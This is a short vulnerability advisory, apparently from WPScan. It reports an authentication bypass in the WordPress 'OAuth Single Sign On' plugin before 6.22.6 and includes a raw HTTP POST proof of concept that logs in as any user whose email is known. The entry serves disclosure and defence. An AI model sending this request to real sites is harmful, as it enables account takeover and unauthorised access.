Lucene search

K
wpvulndbLana CodesWPVDB-ID:E76939CA-180F-4472-A26A-E0C36CFD32DE
HistoryJun 27, 2022 - 12:00 a.m.

OAuth Single Sign On < 6.22.6 - Authentication Bypass

2022-06-2700:00:00
Lana Codes
wpscan.com
25

0.001 Low

EPSS

Percentile

40.2%

The plugin doesn’t validate that OAuth access token requests are legitimate, which allows attackers to log onto the site with the only knowledge of a user’s email address.

PoC

POST / HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 40 Connection: close option=mooauth&email;[email protected]

0.001 Low

EPSS

Percentile

40.2%

Related for WPVDB-ID:E76939CA-180F-4472-A26A-E0C36CFD32DE